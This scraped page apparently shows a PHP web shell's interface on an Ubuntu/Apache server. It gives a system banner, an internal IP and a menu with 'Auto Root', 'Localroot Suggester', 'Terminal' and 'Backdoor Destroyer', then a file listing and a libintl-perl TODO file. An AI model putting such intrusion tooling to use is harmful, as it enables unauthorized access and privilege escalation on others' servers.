Linux jobworks 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
Apache/2.4.58 (Ubuntu)
Server IP : 10.0.1.5 & Your IP : 216.73.216.61
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
libintl-perl /
Delete
Unzip
Name
Size
Permission
Date
Action
examples
[ DIR ]
drwxr-xr-x
2025-08-05 17:14
FAQ
304
B
-rw-r--r--
2025-08-05 17:14
README.gz
3.94
KB
-rw-r--r--
2025-08-05 17:14
THANKS
1.34
KB
-rw-r--r--
2025-08-05 17:14
TODO
887
B
-rw-r--r--
2025-08-05 17:14
changelog.Debian.gz
2.04
KB
-rw-r--r--
2024-03-30 23:52
copyright
1.56
KB
-rw-r--r--
2022-12-22 16:40
Save
Rename
- web_set_locale returns the language and the country for lang/country combinations (eg. de-AT) in the language field. Correct? - add conversion modules for other Unicode encodings than UTF-8 (UTF-16, UCS-*) - Better support for Windows, the locale detection stuff does not really work there. Any help would be appreciated. - Check whether other locale categories than LC_MESSAGES work. - Avoid call to __load_domain in Locale::gettext_pp, use a cache table first - The pure Perl version of gettext will always look for message catalogs in /usr/share/locale/{LANGUAGE}/LC_MESSAGES after the directory specified by bindtextdomain(). This can lead to undesired results. But I think the C version from libintl does the same, correct? - Allow to dynamically expand the list of supported conversions - Allow to dynamically restrict the list of suppported conversions